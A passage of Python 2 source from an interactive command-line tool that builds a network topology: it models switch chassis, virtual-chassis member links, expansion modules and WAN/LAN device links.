elif re.match(r'^(SFP\+?|RJ45)$', mediaOne) and re.match(r'^(SFP\+?|RJ45)$', mediaTwo):
#print "Tenative Match! -> Link 1: " + mediaOne + " and Link 2: " + mediaTwo
print "Warning: One side of this link is RJ45 (copper) and the other is SFP. Make sure you have a RJ45 (copper) SFP."
isMediaValid = True
else:
#print "Link 1: " + mediaOne + " and Link 2: " + mediaTwo
pass
if isMediaValid:
for speedOne in links[one]['PosSpeed']:
#print "Speed 1"
for speedTwo in links[two]['PosSpeed']:
#print "Speed 2"
if speedOne == speedTwo:
print "Match! -> Link 1: " + speedOne + " and Link 2: " + speedTwo
speedOptions.append(speedOne)
isSpeedValid = True
break
else:
#print "Link 1: " + speedOne + " and Link 2: " + speedTwo
pass
if isSpeedValid:
print "Link request valid!!!"
question = "Choose a speed"
selection = getOptionAnswer(question, speedOptions)
# Select the speed for this link
if selection != "Go Back":
print "Speed selected is: " + selection
# Add the link
if len(links[one]['PosMedia']) > 1:
if selection == '10G':
links[one].update({ 'ActMedia' : 'SFP+' })
else:
links[one].update({ 'ActMedia' : 'SFP' })
links[one].update({ 'ActSpeed' : selection })
if len(links[two]['PosMedia']) > 1:
if selection == '10G':
links[two].update({ 'ActMedia' : 'SFP+' })
else:
links[two].update({ 'ActMedia' : 'SFP' })
links[two].update({ 'ActSpeed' : selection })
addLinks(links)
else:
print "Speed is not compatible...try again"
print "Link request invalid!"
else:
print "Media is not compatible...try again"
print "Link request invalid!"
else:
print "Links must be between different hosts"
print "Link request invalid!"
# Create link and add ports
# links.update({ linkNum : {} })
# links[linkNum].update({ 'Hostname' : hostname })
# links[linkNum].update({ 'PosSpeed' : [] })
# links[linkNum].update({ 'PosMedia' : [] })
# links[linkNum].update({ 'ActSpeed' : speed })
# links[linkNum].update({ 'ActMedia' : media })
# links[linkNum].update({ 'FPC' : props['fpc'] })
# links[linkNum].update({ 'PIC' : props['pic'] })
# links[linkNum].update({ 'PORT' : props['port'] })
def addLinks(links):
host = ""
# Add attributes to ports
for linkNum in links:
if links[linkNum]['Hostname'] in lan_router:
host = links[linkNum]['Hostname']
media = links[linkNum]['ActMedia']
speed = links[linkNum]['ActSpeed']
fpc = links[linkNum]['FPC']
pic = links[linkNum]['PIC']
aport = links[linkNum]['PORT']
# Set port attributes
lan_router[host]['interfaces']['physical'][fpc][pic][aport].update({ 'is_linked' : True })
lan_router[host]['interfaces']['physical'][fpc][pic][aport].update({ 'type' : media })
lan_router[host]['interfaces']['physical'][fpc][pic][aport].update({ 'speed' : speed })
#lan_router[host]['interfaces']['physical'][fpc][pic][aport].update({ 'access_mode' : 'VCP' })
# Create link
# link_map[]
newKey = 1
# Create link_id
if link_map.has_key(newKey):
newKey = max(link_map.keys()) + 1
link_map.update({ newKey : {} })
else:
link_map.update({ newKey : {} })
# Add attributes to new link
if links[1]['Hostname'] in wan_router:
# Side A
link_map[newKey].update({ 'sideA_host' : links[1]['Hostname'] })
intf = str(links[1]['PORT'])
link_map[newKey].update({ 'sideA_port' : intf })
# Side B
link_map[newKey].update({ 'sideB_host' : links[2]['Hostname'] })
intf = str(links[2]['FPC']) + '/' + str(links[2]['PIC']) + '/' + str(links[2]['PORT'])
link_map[newKey].update({ 'sideB_port' : intf })
link_map[newKey].update({ 'speed' : speed })
link_map[newKey].update({ 'type' : media })
elif links[2]['Hostname'] in wan_router:
# Side A
link_map[newKey].update({ 'sideA_host' : links[1]['Hostname'] })
intf = str(links[1]['FPC']) + '/' + str(links[1]['PIC']) + '/' + str(links[1]['PORT'])
link_map[newKey].update({ 'sideA_port' : intf })
# Side B
link_map[newKey].update({ 'sideB_host' : links[2]['Hostname'] })
intf = str(links[2]['PORT'])
link_map[newKey].update({ 'sideB_port' : intf })
link_map[newKey].update({ 'speed' : speed })
link_map[newKey].update({ 'type' : media })
else:
# Side A
link_map[newKey].update({ 'sideA_host' : links[1]['Hostname'] })
intf = str(links[1]['FPC']) + '/' + str(links[1]['PIC']) + '/' + str(links[1]['PORT'])
link_map[newKey].update({ 'sideA_port' : intf })
# Side B
link_map[newKey].update({ 'sideB_host' : links[2]['Hostname'] })
intf = str(links[2]['FPC']) + '/' + str(links[2]['PIC']) + '/' + str(links[2]['PORT'])
link_map[newKey].update({ 'sideB_port' : intf })
link_map[newKey].update({ 'speed' : speed })
link_map[newKey].update({ 'type' : media })
print "[Link Map]"
pp.pprint(link_map)
#print "Lan Router " + "(" + host + ")"
#pp.pprint(lan_router[host])
# Creates dictionary of the passed chassis's modules
def moduleDict(hostname):
chassis_mod_dict = {}
for fpc in lan_router[hostname]['interfaces']['physical'].keys():
chassis_mod_dict.update({ fpc : {} })
# Loop over member components, following "if" targets PICs
for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
#pp.pprint(lan_router[hostname])
# General modules (inclduing VCP, Expansion, Builtin)
if(isinstance( pic, ( int, long ) )):
chassis_mod_dict[fpc].update({ pic : [] })
chassis_mod_dict[fpc][pic].append(lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod'])
# Check for auxillary modules (EX4300-UM-4XSFP)
if lan_router[hostname]['interfaces']['physical'][fpc][pic].has_key('aux_mod'):
chassis_mod_dict[fpc][pic].append(lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_mod'])
return chassis_mod_dict
# Assign VCPs Menu
def assignVCPsMenu():
hostname = selectChassisMenu("vc")
if hostname:
chassisStat = vcScan(hostname)
question = "Select a chassis operation"
if chassisStat == "VCP" or chassisStat == "QSFP":
option = [ "Automatic Add", "Manual Add", "Go Back" ]
selection = ""
#while True:
selection = getOptionTRAnswer(question, option)
if selection == 0:
assignVCPs(hostname, "auto", moduleDict(hostname))
elif selection == 1:
assignVCPs(hostname, "manual", moduleDict(hostname))
elif chassisStat == "NONE":
option = [ "Manual Add", "Go Back" ]
selection = ""
#while True:
selection = getOptionTRAnswer(question, option)
if selection == 0:
assignVCPs(hostname, "manual", moduleDict(hostname))
# Assign VCPs - two options, automatic and manual. Automatic is for VC stacks with all QSFP+ or VCP links only
# Create link and add ports
# links.update({ linkNum : {} })
# links[linkNum].update({ 'Hostname' : hostname })
# links[linkNum].update({ 'PosSpeed' : [] })
# links[linkNum].update({ 'PosMedia' : [] })
# links[linkNum].update({ 'FPC' : props['fpc'] })
# links[linkNum].update({ 'PIC' : props['pic'] })
# links[linkNum].update({ 'PORT' : props['port'] })
def reserveVCPs(host, a_fpc, modDict):
intf_num = 1
inc = 0
mylink = {}
print "Neighor Member " + str(a_fpc)
# Loop over PICs in neighbor FPC
for a_pic in modDict[a_fpc].keys():
for module in modDict[a_fpc][a_pic]:
print "Checking module: " + module + "..."
if module in modular_model.keys():
print "Valid module!"
type_list = modular_model[module]['intf_type']
intf_speed = modular_model[module]['speed'][-1] # Use the last element in this list
if ("QSFP+" in type_list) or ("VCP" in type_list):
intf_type = modular_model[module]['intf_type'][-1] # Use the last element in this list
print "Module VCP capable..."
for a_port in lan_router[host]['interfaces']['physical'][a_fpc][a_pic]:
if(isinstance( a_port, ( int, long ) )):
print "Model: " + module + " FPC: " + str(a_fpc) + " PIC: " + str(a_pic) + " PORT: " + str(a_port)
intf = str(a_fpc) + "/" + str(a_pic) + "/" + str(a_port)
if isInterfaceAvailable(intf, host):
# Modify port parameters for this link
print "Interface found"
lan_router[host]['interfaces']['physical'][a_fpc][a_pic][a_port].update({ 'access_mode' : 'VCP' })
#lan_router[host]['interfaces']['physical'][a_fpc][a_pic][a_port].update({ 'type' : intf_type })
#lan_router[host]['interfaces']['physical'][a_fpc][a_pic][a_port].update({ 'speed' : intf_speed })
print "Inteface Speed: " + intf_speed
# Parameters for creating link
mylink.update({ 'Hostname' : host })
mylink.update({ 'ActSpeed' : intf_speed })
mylink.update({ 'ActMedia' : intf_type })
mylink.update({ 'FPC' : a_fpc })
mylink.update({ 'PIC' : a_pic })
mylink.update({ 'PORT' : a_port })
inc += 1
else:
print "Interface used"
if inc == intf_num:
print "Break 1"
break
if inc == intf_num:
print "Break 2"
break
if inc == intf_num:
print "Break 3"
break
return mylink
def assignVCPs(host, mode, modDict):
# Number of FPCs or members in this stack
links = {}
stack_size = len(lan_router[host]['interfaces']['physical'])
# Loop through modDict for each FPC in stack. This is the LOCAL member
for fpc in modDict.keys():
# Get the neighbors of this FPC, put them in a list, fpc_a and fpc_b
mymap = link_mapping("braided", stack_size, fpc)
a_fpc = mymap[0]
b_fpc = mymap[1]
# Loop over neighbor list
for a_fpc in mymap:
# Check if LOCAL member is lower #, if yes, reserve ports and create link
if a_fpc > fpc:
neigh_dict = reserveVCPs(host, a_fpc, modDict)
local_dict = reserveVCPs(host, fpc, modDict)
#print "Neigh Dict"
#pp.pprint(neigh_dict)
#print "Local Dict"
#pp.pprint(local_dict)
#print "Combined Dict"
links.update({ 1 : {} })
links.update({ 2 : {} })
links[1].update(neigh_dict)
links[2].update(local_dict)
pp.pprint(links)
addLinks(links)
else:
# Go to next neighbor
pass
# VCP Links
def vcScan(hostname):
modDict = moduleDict(hostname)
print "Hostname: " + hostname
pp.pprint(modDict)
noChassQSFP = False
noChassVCP = False
# Loop over FPCs modules and check for VCP capability
for fpc in modDict.keys():
noFpcQSFP = True
noFpcVCP = True
# Loop over PICs in FPC
for pic in modDict[fpc].keys():
for module in modDict[fpc][pic]:
if module in modular_model.keys():
# VCP levels are... 1. DEFAULT (VCP or QSFP+), 2. 10G (optical SFP+), 3. NONE (no VCP capable ports)
intf_type = modular_model[module]['intf_type']
else:
intf_type = system_model[module]['intf_type']
# Determine the port types
for mytype in intf_type:
if mytype == "QSFP+":
noFpcQSFP = False
elif mytype == "VCP":
noFpcVCP = False
if noFpcQSFP:
noChassQSFP = True
elif noFpcVCP:
noChassVCP = True
#print "FPC: " + str(fpc) + " PIC: " + str(pic) + " Module: " + module
if noChassQSFP and noChassVCP:
print "Virtual Chassis has no standard VCP ports!"
myVCP = "NONE"
elif not noChassQSFP:
print "Virtual Chassis has QSFP+ for VCP"
myVCP = "VCP"
elif not noChassVCP:
print "Virtual Chassis has VCP for VCP"
myVCP = "QSFP"
return myVCP
#stack_size = len(lan_router[hostname]['interfaces']['physical'])
#for fpc in modDict.keys():
# neigh_list = link_mapping("braided", stack_size, fpc)
# Function for determining which VC members a specific chassis will link with
def link_mapping(map_type, stack_size, member_num):
s1 = 0
s2 = 0
# Determine mappings for "long loop" type member
if map_type == 'longloop':
if stack_size == 2 and member_num == 1:
s1 = 0
s2 = 0
elif member_num == 0:
s1 = 1
s2 = stack_size - 1
elif member_num == (stack_size - 1):
s1 = 0
s2 = stack_size - 2
else:
s1 = member_num - 1
s2 = member_num + 1
# Determine mappings for "braided" type member
else:
if stack_size == 2 and member_num == 0:
s1 = 1
s2 = 1
elif stack_size == 2 and member_num == 1:
s1 = 0
s2 = 0
elif stack_size == 3 and member_num == 1:
s1 = 0
s2 = 2
elif stack_size == 4 and member_num == 2:
s1 = 0
s2 = 3
elif member_num == 0:
s1 = 1
s2 = 2
elif member_num == 1:
s1 = 0
s2 = 3
elif member_num == (stack_size - 1):
s1 = member_num - 2
s2 = member_num - 1
elif member_num == (stack_size - 2):
s1 = member_num - 2
s2 = member_num + 1
else:
s1 = member_num - 2
s2 = member_num + 2
s_list = []
s_list.append(s1)
s_list.append(s2)
print "( " + str(s1) + ", " + str(s2) + " )"
return s_list
###############################
# ========== MENUS ========== #
###############################
# Primary Menu
def mainMenu():
fn = "mydict.csv"
question = "Select an operation"
option = [ "Build Chassis", "Define Inter-Connects", "Show Devices", "Modify Chassis", "Save Topology", "Load Topology", "Exit" ]
selection = ""
while True:
selection = getOptionTRAnswer(question, option)
if selection == 0:
buildChassisMenu()
elif selection == 1:
linkMenu()
elif selection == 2:
showDeviceMenu()
elif selection == 3:
modChassisMenu()
elif selection == 4:
global lan_router
global wan_router
saveDict(lan_router, 'lan_router')
saveDict(wan_router, 'wan_router')
elif selection == 5:
lan_router.clear()
wan_router.clear()
lan_router = openDict('lan_router')
wan_router = openDict('wan_router')
#print lan_router
#print wan_router
else: break
# Build chassis Menu
def buildChassisMenu():
question = "Select a chassis operation"
option = [ "Add WAN Device", "Add LAN Device", "Show Devices", "Go Back" ]
selection = ""
while True:
selection = getOptionTRAnswer(question, option)
if selection == 0:
addWANDevice()
elif selection == 1:
addDeviceMenu()
elif selection == 2:
showDeviceMenu()
else: break
# Link Menu
def linkMenu():
question = "Select a link operation"
option = [ "Create Links", "Display Interfaces", "Assign VCPs", "Go Back" ]
selection = ""
while True:
selection = getOptionTRAnswer(question, option)
if selection == 0:
createLink()
elif selection == 1:
displayIntfMenu()
elif selection == 2:
assignVCPsMenu()
else: break
# Link Menu - Select Devices - options ('lan', 'wan', 'both') default to 'lan'
# This function gets the current hostnames, ask for user to select one, and returns that hostname.
def selectDevices(devices='lan'):
# Create option list
option = []
# Add hostnames to list depending on argument
if devices == 'lan' or devices == 'both':
for hostname in lan_router.keys():
option.append(hostname)
if devices == 'wan' or devices == 'both':
for hostname in wan_router.keys():
option.append(hostname)
option.append("Go Back")
# Ask user to select 2 devices
question = "Choose a system"
selection = getMultiAnswer(question, option, 2)
for host in selection:
print "Host -> " + host
return selection
# Display Interfaces Menu
def displayIntfMenu():
try:
displayInterfaces(selectChassisMenu())
except Exception as err:
pass
# Menu for displaying chassis
def showDeviceMenu():
# Display a basic display of chassis
displayChassisBasic()
print "Choose a switch for more detail:"
hostname = selectChassisMenu()
if hostname:
# Display Detailed Chassis View
print "\n" + "=" * 95
print "Hostname:\t" + hostname
# For Single Chassis or Virtual Chassis
if hostname in lan_router.keys():
print "System Type:\t" + lan_router[hostname]['system_type']
if lan_router[hostname]['chassis_type'] == 'stackable':
# Virtual Chassis
if lan_router[hostname]['is_vc']:
print "Model:\t\tVirtual Chassis"
for fpc in lan_router[hostname]['interfaces']['physical'].keys():
print "-" * 95
print "VC " + str(fpc) + ":\t" + lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod'] + "\t" + \
str(lan_router[hostname]['interfaces']['physical'][fpc]['vc_priority'])
for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
#pp.pprint(lan_router[hostname])
# General modules (inclduing VCP, Expansion, Builtin)
if(isinstance( pic, ( int, long ) )):
module_mod = lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
# If it's a module
if module_mod in modular_model.keys():
if 'VCP' in modular_model[module_mod]['intf_type']:
print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod'] + " (VCP)"
else:
print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
# If it's native
else:
print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
# Check for auxillary modules (EX4300-UM-4XSFPP)
if lan_router[hostname]['interfaces']['physical'][fpc][pic].has_key('aux_mod'):
print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_type'] + "):\t" + \
lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_mod']
print "-" * 95
print "=" * 95
# Single Chassis
else:
fpc = 0
print "Model:\t\t" + lan_router[hostname]['chassis_mod']
print "-" * 95
print "FPC " + str(fpc) + ":\t" + lan_router[hostname]['chassis_mod']
for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
#pp.pprint(lan_router[hostname])
# General modules (inclduing VCP, Expansion, Builtin)
if(isinstance( pic, ( int, long ) )):
module_mod = lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
# If it's a module
if module_mod in modular_model.keys():
if 'VCP' in modular_model[module_mod]['intf_type']:
print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod'] + " (vcp)"
else:
print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
# If it's native
else:
print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] + "):\t" + \
lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
# Check for auxillary modules (EX4300-UM-4XSFPP)
if lan_router[hostname]['interfaces']['physical'][fpc][pic].has_key('aux_mod'):
print "\tPIC " + str(pic) + "\t(" + lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_type'] + "):\t" + \
lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_mod']
print "=" * 95
# For Modular Chassis
else:
print "Model:\t\t" + lan_router[hostname]['chassis_mod']
for fpc in sorted(lan_router[hostname]['interfaces']['physical'].keys()):
print "-" * 95
print "FPC " + str(fpc) + ":\t" + lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
print "-" * 95
print "=" * 95
# Display Chassis Visualization
displayChassisHardware(hostname, "Both")
# Should only match WAN system
else:
print "System Type:\twan"
print "Model:"
for wanlink in wan_router[hostname]['intf_name']:
print "Link:\t" + wanlink
# Create a WAN device
def addWANDevice():
wan_hostname = getInputAnswer("Enter a hostname")
wan_router.update({ wan_hostname : {} })
wan_intf = []
while True:
wan_intfname = getInputAnswer("Enter " + wan_hostname + " interface name")
if wan_intfname == "q":
wan_router[wan_hostname].update({ 'intf_name' : wan_intf })
break
else:
wan_intf.append(wan_intfname)
is_preferred = getYNAnswer("Is " + wan_hostname + " the preferred egress")
if is_preferred == "y":
wan_router[wan_hostname].update({ 'pref_egress' : True })
else:
wan_router[wan_hostname].update({ 'pref_egress' : False })
pp.pprint(wan_router)
# Delete system menu
def deleteChassisMenu():
# Create option list
option = []
for hostname in sorted(lan_router.keys()):
option.append(hostname)
option.append("Go Back")
# Display the chassis members and ask which one to remove
question = "Select chassis to delete"
selection = getOptionAnswer(question, option)
# Delete entire system
if selection != "Go Back":
del lan_router[selection]
# Create a MDF/IDF device
def addDeviceMenu():
question = "Select a system type to create"
option = [ "Single Chassis", "Virtual Chassis", "Delete Chassis", "Show Devices", "Go Back" ]
selection = ""
while selection != 4:
selection = getOptionTRAnswer(question, option)
# Single Chassis Selection
if selection == 0:
addSystemSingleChassis(setSystemCommon())
# Virtual Chassis Selection
elif selection == 1:
createVC()
elif selection == 2:
deleteChassisMenu()
elif selection == 3:
showDeviceMenu()
else: break
# Modify Menu
def modChassisMenu():
displayChassisBasic()
hostname = selectChassisMenu()
question = "Please choose an action"
if hostname is not None:
if lan_router[hostname]['chassis_type'] == 'modular':
while True:
option = [ "Change Hostname", "Add FPCs", "Delete FPCs", "Show Devices", "Go Back" ]
print "Device: " + hostname
selection = getOptionTRAnswer(question, option)
if selection == 0:
setSystemHostname(selectChassisMenu('single'))
elif selection == 1:
addFPC(hostname)
elif selection == 2:
delFPC(hostname)
elif selection == 3:
showDeviceMenu()
else:break
elif lan_router[hostname]['is_vc']:
while True:
option = [ "Change Hostname", "Add Member", "Delete Member", "Show Devices", "Go Back" ]
print "Device: " + hostname
selection = getOptionTRAnswer(question, option)
if selection == 0:
setSystemHostname(hostname)
elif selection == 1:
addSystemVirtualChassis(hostname, nextMember(hostname))
elif selection == 2:
delSystemChassisMenu(hostname)
elif selection == 3:
showDeviceMenu()
else:break
else:
while True:
option = [ "Change Hostname", "Add Modules", "Delete Modules", "Show Devices", "Go Back" ]
print "Device: " + hostname
selection = getOptionTRAnswer(question, option)
if selection == 0:
setSystemHostname(hostname)
elif selection == 1:
addModules(hostname, 'expan', 0)
elif selection == 2:
delModules(hostname)
elif selection == 3:
showDeviceMenu()
else:break
# Asks user to select a chassis and return the name vc/single/all
def selectChassisMenu(chassis_type="all"):
# Create option list
option = []
for hostname in sorted(wan_router.keys()):
option.append(hostname)
for hostname in sorted(lan_router.keys()):
# For virtual chassis
if chassis_type == "vc":
if lan_router[hostname]['chassis_type'] == 'stackable' and lan_router[hostname]['is_vc']:
option.append(hostname)
# For single chassis
elif chassis_type == "single":
# Stackable Chassis
if lan_router[hostname]['chassis_type'] == 'stackable' and not lan_router[hostname]['is_vc']:
option.append(hostname)
# Modular Chassis
elif lan_router[hostname]['chassis_type'] == 'modular':
option.append(hostname)
# For ALL chassis
else:
option.append(hostname)
option.append("Go Back")
# Display the chassis members and ask which one to remove
question = "Select chassis"
selection = getOptionAnswer(question, option)
# If ask to "Go Back" return None
if selection == "Go Back":
return False
# Otherwise, return the chassis name
else:
return selection
##################################################
# ========== SINGLE CHASSIS FUNCTIONS ========== #
##################################################
# Creates a single chassis system
def addSystemSingleChassis(hostname, fpc=0):
if hostname is not None:
# Set Router Model
model = getOptionAnswer("Select the router model", system_model.keys())
# If this is a modular system
if system_model[model]['chassis_type'] == "modular":
# Set Dictionary Format for chassis
lan_router[hostname].update({ 'chassis_type' : 'modular' })
lan_router[hostname].update({ 'is_vc' : False })
lan_router[hostname].update({ 'chassis_mod' : model })
lan_router[hostname].update({ 'interfaces' : {} })
lan_router[hostname]['interfaces'].update({ 'physical' : {} })
# Add first FPC, must have at least one RE
addFPC(hostname)
# Add FPCs to chassis
getfpc = 'y'
while getfpc is 'y':
getfpc = getYNAnswer("Add another FPC")
if getfpc is 'y':
addFPC(hostname)
# If this is a stackable system
else:
# Set Dictionary Format for stackable
lan_router[hostname].update({ 'chassis_type' : 'stackable' })
lan_router[hostname].update({ 'is_vc' : False })
lan_router[hostname].update({ 'chassis_mod' : model })
# Add Native Ports
if fpc == 0:
lan_router[hostname].update({ 'interfaces' : {} })
lan_router[hostname]['interfaces'].update({ 'physical' : {} })
addNativeInterfaces(hostname, model, False, fpc, 0)
# Add Built-in Modules
addModules(hostname, 'builtin', fpc)
# Add Expansion Modules
print "Enter Expansion..."
if getYNAnswer("Will this system have expansion modules") == 'y':
addModules(hostname, 'expan', fpc)
print "Finished system creation."
# Adding Modules
def addModules(hostname, module_type, fpc=0):
print "\n************************************"
print "* Add Expansion Modules to Chassis *"
print "************************************\n"
# Common Variables
expan_mod = ""
expan_slot = ""
model = ""
# Determine if this is a virtual chassis module or standalone to reference correct chassis mod
if lan_router[hostname]['chassis_mod'] == 'Virtual_Chassis':
model = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
else:
model = lan_router[hostname]['chassis_mod']
# Build Expansion Modules
if module_type == 'expan':
# Get Expansion Module
question1 = "Select Expansion Module"
opt1 = []
for module in system_model[model]['expan_mods']:
opt1.append(module)
opt1.append("Go Back")
while True:
# Loop through possible expansion slots
for slot in system_model[model]['expan_slots']:
not_matched = True
# Loop through keys under FPC
for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
# Check if switch has this slot populated
if str(slot) == str(pic):
#print "Matched!!"
not_matched = False
if lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] == 'expan':
print "PIC Slot " + str(pic) + " currently contains " + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
else:
print "PIC Slot " + str(pic)
# This matches if nothing is matched in the for loop
if not_matched:
print "PIC Slot " + str(slot) + " is empty"
# Ask user to select an expansion model to add
expan_mod = getOptionAnswer(question1, opt1)
if expan_mod == "Go Back":
break
else:
# Get Available Slot
question2 = "Select a slot"
opt2 = []
for slot in system_model[model]['expan_slots']:
opt2.append(str(slot))
opt2.append("Go Back")
while True:
# Ask user which slot to put the PIC in
expan_slot = getOptionAnswer(question2, opt2)
if expan_slot == "Go Back":
break
else:
addModuleInterfaces(hostname, fpc, int(expan_slot), expan_mod)
break
# Build Built-In Modules
elif module_type == 'builtin':
opt1 = []
opt2 = []
for slot in system_model[model]['builtin_slots']:
opt1.append(slot)
for module in system_model[model]['builtin_mods']:
opt2.append(module)
# Combine lists into dict
built_dict = dict(zip(opt1, opt2))
# Loop over built-in slots/mods
for builtin_slot, builtin_mod in built_dict.iteritems():
addModuleInterfaces(hostname, fpc, int(builtin_slot), builtin_mod)
# Add chassis FPCs, includes linecards and routing engines
def addFPC(hostname):
#pp.pprint(lan_router)
# Get hosts chassis model
chassis_model = lan_router[hostname]['chassis_mod']
# Create option list
option = []
module = ""
# Create a list of the possible modules
if not lan_router[hostname]['interfaces']['physical'].keys():
for module_mod in modular_model.keys():
if chassis_model in modular_model[module_mod]['supported_chassis'] and "SRE" in module_mod:
option.append(module_mod)
option.append("Go Back")
question = "No SREs detected, you MUST have at least one SRE"
module = getOptionAnswer(question, option)
else:
# Display the chassis members and ask which one to add
for module_mod in modular_model.keys():
if chassis_model in modular_model[module_mod]['supported_chassis']:
option.append(module_mod)
option.append("Go Back")
question = "Select module to add"
module = getOptionAnswer(question, option)
if module != "Go Back":
# Possible FPCs
possFPCs = []
availFPCs = []
# Check if this is an SRE or LINECARD
if "SRE" in module:
possFPCs = system_model[chassis_model]['sre_slots']
else:
possFPCs = system_model[chassis_model]['expan_slots']
print "possFPCs: " + str(possFPCs)
# Used FPCs on host
usedFPCs = lan_router[hostname]['interfaces']['physical'].keys()
print "usedFPCs: " + str(usedFPCs)
# Determine available FPC slots
for fpc in possFPCs:
if fpc not in usedFPCs:
availFPCs.append(str(fpc))
availFPCs.append("Go Back")
print "AvailFPCs"
print availFPCs
# Ask user to select an FPC
question = "Select an FPC to add this module to"
fpc_add = getOptionAnswer(question, availFPCs)
#print "FPC_add: " + fpc_add
if fpc_add != "Go Back":
# Add interfaces
print "Adding interfaces..."
addChassisInterfaces(hostname, module, int(fpc_add))
# Delete chassis FPCs, includes linecards and routing engines
def delFPC(hostname):
# Display the FPCs in the chassis
if lan_router[hostname]['interfaces']['physical'].has_key():
usedFPCs = lan_router[hostname]['interfaces']['physical'].keys()
question = "Select an FPC to delete"
fpc_delete = getOptionAnswer(question, map(str, usedFPCs))
# Delete the chosen FPC from the lan_router dictionary
try:
del lan_router[hostname]['interfaces']['physical'][int(fpc_delete)]
except Exception as exception:
print "Failed deleting FPC " + fpc_delete
finally:
print "Successfully deleted FPC " + fpc_delete
else:
print "Error: No FPCs to delete"
# Adds interfaces to a chassis-based system
def addChassisInterfaces(hostname, fpc_mod, fpc):
pic = 0
# Get number of ports for this fpc model
port_num = modular_model[fpc_mod]['port_num']
# Build out base of interface heirarchy
lan_router[hostname]['interfaces']['physical'].update({ fpc : {} })
lan_router[hostname]['interfaces']['physical'][fpc].update({ 'fpc_mod' : fpc_mod })
lan_router[hostname]['interfaces']['physical'][fpc].update({ pic : {} })
print "Successfully added " + fpc_mod + " into FPC " + str(fpc) + "..."
# Create ports
for port in range(0, port_num):
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ port : {} })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'port' : port })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_linked' : False })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_bundled' : False })
print "Successfully added interfaces...\n"
# Deleteing Modules for Single Chassis
def delModules(hostname, fpc=0):
model = lan_router[hostname]['chassis_mod']
filled_mod_list = []
# Loop through possible expansion slots
for slot in system_model[model]['expan_slots']:
not_matched = True
# Loop through keys under FPC
for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
# Check if switch has this slot populated
if str(slot) == str(pic):
#print "Matched!!"
not_matched = False
if lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] == 'expan':
print "Slot " + str(pic) + " currently contains " + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
filled_mod_list.append(str(pic))
else:
print "Slot " + str(pic)
# This matches if nothing is matched in the for loop
if not_matched:
print "Slot " + str(slot) + " is empty"
#
filled_mod_list.append("Go Back")
if filled_mod_list:
question = "Select a Module to Delete"
select_mod = getOptionAnswer(question, filled_mod_list)
if select_mod == "Go Back":
print "Delete Cancelled!"
else:
del lan_router[hostname]['interfaces']['physical'][fpc][int(select_mod)]
print "Deleted PIC!"
###################################################
# ========== VIRTUAL CHASSIS FUNCTIONS ========== #
###################################################
# Create initial virtual chassis configuration
def createVC():
# Run the basic system configuration
print "\n**************************"
print "* Create Virtual Chassis *"
print "**************************\n"
host = setSystemCommon()
# Add new chassis to stack
addSystemVirtualChassis(host, nextMember(host))
# Determine the next available member number
def nextMember(hostname):
#top_member = 0
next_member = 0
if 'interfaces' in lan_router[hostname]:
index = 0
for member in lan_router[hostname]['interfaces']['physical'].keys():
if index == member:
index += 1
else:
next_member = index
break
next_member = index
return next_member
# Create virtual chassis system
def addSystemVirtualChassis(hostname, fpc=0):
chassis_mod = ''
# Keep looping through this until we are done adding chassis to the stack
while True:
options = []
for model in system_model.keys():
if system_model[model]['chassis_type'] == 'stackable':
options.append(model)
options.append('Go Back')
chassis_mod = getOptionAnswer("Select a router model to add", options)
if chassis_mod == "Go Back":
break
elif checkStackValid(hostname, chassis_mod):
# Only do these things during the creation of FPC 0 (first FPC)
if fpc == 0:
# Set Dictionary Format for VC
lan_router[hostname].update({ 'is_vc' : True })
lan_router[hostname].update({ 'chassis_type' : 'stackable' })
lan_router[hostname].update({ 'chassis_mod' : 'Virtual_Chassis' })
# Set Native Ports
lan_router[hostname].update({ 'interfaces' : {} })
lan_router[hostname]['interfaces'].update({ 'physical' : {} })
addNativeInterfaces(hostname, chassis_mod, True, fpc, 0)
# Add Built-in Modules
addModules(hostname, 'builtin', fpc)
if getYNAnswer("Add an expansion modules") == 'y':
addModules(hostname, 'expan', fpc)
fpc += 1
# Menu for selecting which chassis to delete from a stack
def delSystemChassisMenu(hostname):
# Get the number of chassis in this stack
